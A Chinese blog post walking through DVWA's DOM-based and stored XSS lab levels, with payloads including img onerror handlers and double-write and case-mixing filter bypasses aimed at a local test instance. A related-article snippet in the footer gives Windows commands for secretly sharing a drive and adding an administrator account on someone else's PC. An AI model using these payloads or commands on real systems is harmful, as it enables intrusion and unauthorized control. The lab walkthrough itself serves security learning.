dvwa xss dom型、存储型三级别实战

最新推荐文章于 2023-10-08 11:50:48 发布
最新推荐文章于 2023-10-08 11:50:48 发布
阅读量289 收藏
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107885040
版权

dvwa xss dom型、存储型三级别实战

dom型xss低中高级别实战
Vulnerability: DOM Based Cross Site Scripting (XSS) m型xss低中高级别实战
Low
在这里插入图片描述

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert("You have been hacked!");</script>

在这里插入图片描述
Medium
在这里插入图片描述

发现对"<script>"标签做了过滤,所以只能尝试其他的标签了,比如<img>的onerror属性,
即img引用出错时会执行onerror中的内容

Payload:?default=English>/option></select><img src='x' onerror='alert(1)'>

注意要闭合了前面的标签,当然了,也可以URL编码之后在GET上去。
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English>/option></select><img src='x' οnerrοr='alert(1)'>

在这里插入图片描述
High
在这里插入图片描述

http://127.0.0.1/dvwa/vulnerabilities/xss_d/
?default=English#<script>alert(/xss/)</script>

在这里插入图片描述
存储型xss低中高级别实战
Vulnerability: Stored Cross Site Scripting (XSS)
Low
在这里插入图片描述

message一栏输入<script>alert(/xss/)</script>,成功弹框:

在这里插入图片描述

name一栏前端有字数限制,抓包改为<script>alert(/name/)</script>

在这里插入图片描述
在这里插入图片描述
Medium
在这里插入图片描述
双写绕过

抓包改name参数为<sc<script>ript>alert(/xss/)</script>:

在这里插入图片描述
在这里插入图片描述
大小写混淆绕过

抓包改name参数为<Script>alert(/xss/)</script>:

在这里插入图片描述
在这里插入图片描述
High
在这里插入图片描述

这里使用正则表达式过滤了<script>标签,但是却忽略了img、iframe等其它危险的标签,
因此name参数依旧存在存储型XSS。
抓包改name参数为<img src=1 οnerrοr=alert(1)>

在这里插入图片描述
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3098
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
攻防世界-web高手进阶区
zji
04-25 4924
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 3776
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
前端扫盲1
weixin_43910086的博客
06-09 320
[转]信息安全相关理论题(四)
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、网上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
零基础,想做一名网络安全工程师,我可以去哪里学,或者有什么建议?
zkaqlaoniao的博客
10-08 273
这些网站其实就可能存在前端展现的问题,后端逻辑的问题,数据存储安全问题,如何找出这些网站的漏洞原理,如何去修复和完善这些网站的问题,就是这个方向要研究的。内容(比如改大学教务系统的考试成绩),留一下一个网站的webshell等等其实都属于网络渗透的内容,由于互联网与信息化的普及网站系统对外的业务较多,且由于程序员的水平层次不齐与运维人员的一些配置失误,网络渗透需要掌握的内容较多。你可能无法很快的及时的得到一个积极的有趣的反馈和奖励,所以说很有可能在你学编程的这个阶段,你就把自己给劝退了。
java笔记整理
weixin_42615335的博客
10-20 1331
目前比较流行的java技术整理
渗透测试以及安全面试的经验之谈-技术篇
weixin_34100227的博客
06-18 9925
技术面试问题 CTF 说一个印象深刻的CTF的题目 Padding Oracle->CBC->密码学(RSA/AES/DSA/SM) CRC32 反序列化漏洞 sql二次注入 第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是...
[转]信息安全相关理论题(二)
热门推荐
Herry_Lee的专栏
02-18 18万+
27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸 A、 对 B、 错 您的答案: 标准答案: B 28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是 A、 传输层 B、 表示层 C、 会话层 D、 应用层 您的答案: 标准答案: C 29、网络中端口与端口之间连接所用的层是 A、 网络层 B、 表示层 ...
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射XSS存储XSSDOMXSS个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
E069-web安全应用-存储XSS的场景实践.pdf
12-02
本资源讲解了存储XSS(Cross-Site Scripting)的攻击场景实践,通过DVWA(Damn Vulnerable Web Application)平台来演示整个攻击过程。 知识点1:存储XSS的定义和原理 存储XSS是一种类的跨站脚本攻击,...
DVWA下的XSS
07-25
#### 存储XSS 存储XSS的攻击原理与反射类似,但区别在于恶意代码是直接存储在服务器上的,当用户访问相关页面时,恶意代码被执行。 1. **Low级别** - 防护机制:使用`trim()`、`mysql_real_escape_...
DVWA靶场搭建与使用
09-02
2. **跨站脚本(XSS)**:分为存储XSS和反射XSS,通过注入恶意脚本,使用户在浏览页面时被执行。 3. **文件包含**:通过文件包含漏洞,可以尝试加载服务器上的任意文件,甚至执行服务器上的命令。 4. **命令注入...
简单入侵操作
永不垂头的博客
06-30 9729
学习笔记—简单入侵操作 趁别人不在的时间操作他人电脑 打开cmd 输入:net share c$=c:\(将他的磁盘共享出去,同时也要打开电脑上的允许远程操控权限) 然后ipconfig下,记录他的ip 写好.bat脚本。 net user admin 123456 /add net localgroup administrators admin /add shutdown -s -t 60 -c “这个年纪你睡得着觉?” 从本机cmd上输入net use k: \192.168.1.103\c$
解决kali不显示网卡
永不垂头的博客
07-10 7684
学习笔记—解决kali不显示网卡 状况图 首先在本机检查vm服务是否开启 服务开启后进入vi /etc/network/interfaces 编辑,添加 auto eth0 iface eth0 inet dhcp wq保存退出 /etc/init.d/networking restart 重启网卡恢复正常 了解更多请关注下列公众号: 了解更多请关注下列公众号: ...
资产收集的方法总结
永不垂头的博客
02-01 6084
资产收集的方法总结 文章目录资产收集的方法总结前言一、资产收集基本名词概念二、相关收集方法1.fofa2.google搜索语法3.logo4.favicon.ico5.关键字6.维基百科7.天眼查,企查查8. 微信公众号9. APP10.在线接口查询、我的公众号 前言 很多人以为资产收集就是信息收集,刚开始我也是这样认为的,其实信息收集包含资产收集但不限于资产收集,信息收集包含whois,真实IP,网站架构,子域名收集,敏感目录,DNS信息,旁站,C段,端口等;而资产收集主要收集IP和域名,找到属于目标的
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 5082
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
漏洞产生原因
永不垂头的博客
07-16 4788
学习笔记—漏洞产生原因 一、漏洞产生原因 1.静态层 Html JavaScript jQuery Xss 反射的 2.脚本层 ASP PHP JSP ASPX 处理一个参数,服务器性能比较低 文件包含、文件上传、代码执行、、、、、 1M <50M 数据处理出问题 溢出、报错 3.数据层 MYSQL Oracle sqlserver Redis mongodb 溢出漏洞,版本过低,未授权访问, 4.服务层 IIS NGINX APACHE 不安全的HTTP方法,文件解析,代理配置,版本过低
DVWA靶场深度解析:XSS攻击DOM、反射存储实战
"该资源提供的是DVWA(Damn Vulnerable Web Application)靶场中的XSS漏洞实践,包括DOM、反射存储种类XSS攻击。适合网络安全学习者进行练习和理解XSS攻击的原理与防范方法。" 在Web安全领域,XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值